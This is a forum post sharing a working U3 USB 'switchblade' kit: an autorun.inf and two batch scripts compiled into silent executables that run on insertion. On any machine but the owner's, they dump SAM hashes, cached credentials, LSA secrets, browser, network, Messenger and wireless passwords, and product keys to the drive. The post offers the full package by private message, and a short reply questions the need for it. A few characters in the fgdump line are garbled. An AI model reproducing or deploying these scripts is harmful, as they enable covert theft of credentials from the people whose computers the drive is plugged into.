In case anyone is still playing around with this. I've got a version for U3 that allows you to keep your existing U3/Launchpad functionality and still have a switchblade that doesn't run from launchpad autostart.
Pros:
Has built in immunity so you don't scan yourself.
Finds U3 CDrom and flash partition
stores logs on flash partition
All tools stored in CD-ROM partition (now overzealous antivirus can't delete them)
Cons:
Changes to switchblade script or tools requires use of Universal customizer to rebuild CDrom partition image (takes about 1 hour)
autorun.inf
Code:
[AutoRun]
open=START.exe
icon=LaunchU3.exe,0
[Definitions]
Launchpad=LaunchPad.exe
Vtype=2
[CopyFiles]
FileNumber=1
File1=LaunchPad.zip
[Update]
URL=
start.bat (compile to exe using exescript)
Code:
@rem ----- ExeScript Options Begin -----
@rem ScriptType: console,silent
@rem DestDirectory: current
@rem Icon: C:\Documents and Settings\dwk\Desktop\hacksaw\LAUNCHU3.EXE
@rem OutputFile: C:\Documents and Settings\dwk\Desktop\universal customizer\U3CUSTOM\START.exe
@rem ----- ExeScript Options End -----
@ECHO on
:: Thanks to Obi-Wahn
set MyComputers= Andreas_OBI-WAHN
:: It is IMPORTANT that Username and Hostname are as written as stored into the EnvVar
:: Change the combinations to your Settings. and then remove the Line below:
REM set MyComputers=%COMPUTERNAME%_%USERNAME%
set IgnoreMyComputers=Yes
:: This check is set here because it don't have to load all variables if it exits
Set Test=False
If %IgnoreMyComputers%==Yes (
for %%i in (%MyComputers%) do (
If %%i==%COMPUTERNAME%_%USERNAME% (
set Test=True
)
)
)
IF %Test%==True (
LaunchU3.exe -a
) ELSE (
FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (
IF EXIST %%i:\System\SRC\drv.dat (
SET sd=%%i:\System\SRC
)
)
LaunchU3.exe -a & \SRC\go.exe
)
:End
Exit
go.bat
Code:
@rem ----- ExeScript Options Begin -----
@rem ScriptType: console,silent
@rem DestDirectory: current
@rem Icon: none
@rem OutputFile: C:\Documents and Settings\dwk\Desktop\universal customizer\U3CUSTOM\SRC\GO.exe
@rem ----- ExeScript Options End -----
:: Props: Setzer1411, Marc, rpk5000, Gonzor
:: fd = flash partition (writable)
:: U3 = cdrom partition (readonly)
@ECHO off
CD ..\SRC >NUL
If %computername%.==. SET computername=computer
If %username%.==. SET username=None
:: DETERMINE WHICH WHERE THE DRIVES ARE MAPPED
FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (
IF EXIST %%i:\NUL.EXT (
IF EXIST %%i:\System\SRC\drv.dat (
SET fd=%%i:\System
)
)
IF EXIST %%i:\NUL.EXT (
IF EXIST %%i:\SRC\go.exe (
SET U3=%%i:\SRC
)
)
)
:: SET LOG PATHS
IF NOT EXIST %fd%\Logs\%computername% (
MD %fd%\Logs\%computername%
)
DIR /a-d /s "%fd%\Logs\%computername%" | FIND /c ".log" > "%fd%\SRC\###"
SET /p count=<"%fd%\SRC\###"
IF %count%.==. Set count=0
SET logdir=%fd%\Logs\%computername%
SET log="%fd%\Logs\%computername%\%computername%-[%count%].log"
SET tmplog="%fd%\Logs\%computername%\%computername%_TEMP.log"
SET include=%fd%\SRC\Include
SET /p eipurl=<"%fd%\SRC\Include\EIP.dat"
DEL /f /q "%fd%\SRC\###"
:: PAYLOAD
Echo +-----------------------------------+ > %log% 2>&1
Echo ¦ System info ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
Echo Computer Name Is: %computername% And the Logged On User Name Is: %username% The date And Time Is: %date% %time% >> %log% 2>&1
ipconfig /all >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
Echo ¦ Shares ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
net share >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
Echo ¦ Users ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
net user >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
Echo ¦ [Network Services] ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
netstat.exe -abn >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
Echo ¦ [Port Scan] ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
.\portqry -local -l %tmplog% >> %log% 2>&1
COPY %log% + %tmplog%* %log% >> NUL
DEL /f /q %tmplog% >NUL
Echo +-----------------------------------+ >> %log% 2>&1
Echo ¦ Dump Product Keys ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
Echo
.\produkey /nosavereg /stext %tmplog% /remote %computername% >> %log% 2>&1
Copy %log% + %tmplog%* %log% >> nul
Del /f /q %tmplog% >nul
Echo +-----------------------------------+ >> %log% 2>&1
Echo ¦ Dump IE7 Secrets ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
.\iepv.exe /stext %tmplog% >> %log% 2>&1
Copy %log% + %tmplog%* %log% >> nul
Del /f /q %tmplog% >nul
Echo +-----------------------------------+ >> %log% 2>&1
Echo ¦ Dump LSA Secrets ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
.\pspv.exe /stext %tmplog% >> %log% 2>&1
Copy %log% + %tmplog%* %log% >> nul
Del /f /q %tmplog% >nul
Echo +-----------------------------------+ >> %log% 2>&1
Echo ¦ Dump Network PW ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
.\netpass.exe /stext %tmplog% >> %log% 2>&1
Copy %log% + %tmplog%* %log% >> nul
Del /f /q %tmplog% >nul
ECHO +-----------------------------------+ >> %log% 2>&1
ECHO ¦ [Dump Cache] ¦ >> %log% 2>&1
ECHO +-----------------------------------+ >> %log% 2>&1
.\cachedump.exe >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
Echo ¦ FireFox Passwords ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
.\FirePassword.exe >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
Echo ¦ Dump Messenger PW ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
.\mspass.exe /stext %tmplog% >> %log% 2>&1
Copy %log% + %tmplog%* %log% >> nul
Del /f /q %tmplog% >nul
Echo +-----------------------------------+ >> %log% 2>&1
Echo ¦ Internet Explorer History ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
.\iehv.exe /stext %tmplog% >> %log% 2>&1
Copy %log% + %tmplog%* %log% >> nul
Del /f /q %tmplog% >nul
Echo +-----------------------------------+ >> %log% 2>&1
Echo ¦ Dump Wireless Key ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
.\wifike.exe /stext %tmplog% >> %log% 2>&1
Copy %log% + %tmplog%* %log% >> nul
Del /f /q %tmplog% >nul
Echo +-----------------------------------+ >> %log% 2>&1
Echo ¦ Dump URL History ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
cscript //nologo .\DUH.vbs >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
Echo ¦ Dump SAM ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
.\pwdump -o %tmplog% 127.0.0.1 >> %log% 2>&1
@echo on
CD /d %logdir% 2>&1
�%\fgdump.exe -c >> %log% 2>&1
ECHO.¦ >> %log% 2>&1
ECHO -----Hashes-----¦ >> %log% 2>&1
ECHO.¦ >> %log% 2>&1
COPY %log% + %logdir%\127.0.0.1.pwdump %log% >> NUL
DEL /f /q %logdir%\127.0.0.1 >NUL
CD /d �%
ECHO +-----------------------------------+ >> %log% 2>&1
ECHO ¦ [External IP] ¦ >> %log% 2>&1
ECHO +-----------------------------------+ >> %log% 2>&1
.\wget.exe %eipurl% --output-document=%tmplog% 2>&1
Copy %log% + %tmplog%* %log% >> nul
Del /f /q %tmplog% >nul
Echo +-----------------------------------+ >> %log% 2>&1
Echo ¦ Clipboard ¦ >> %log% 2>&1
Echo +-----------------------------------+ >> %log% 2>&1
.\nircmd.exe clipboard addfile %log%
:End
Exit
PM for the zipfile ~4MB and instructions on file layout
Why do you even need a switchblade?
Quote:
|
Originally Posted by Holiday In Express
Business Services
* Copying
* E-mail & Internet
* Facsimile
* PC available
* Printer
* Unstaffed Business Center
|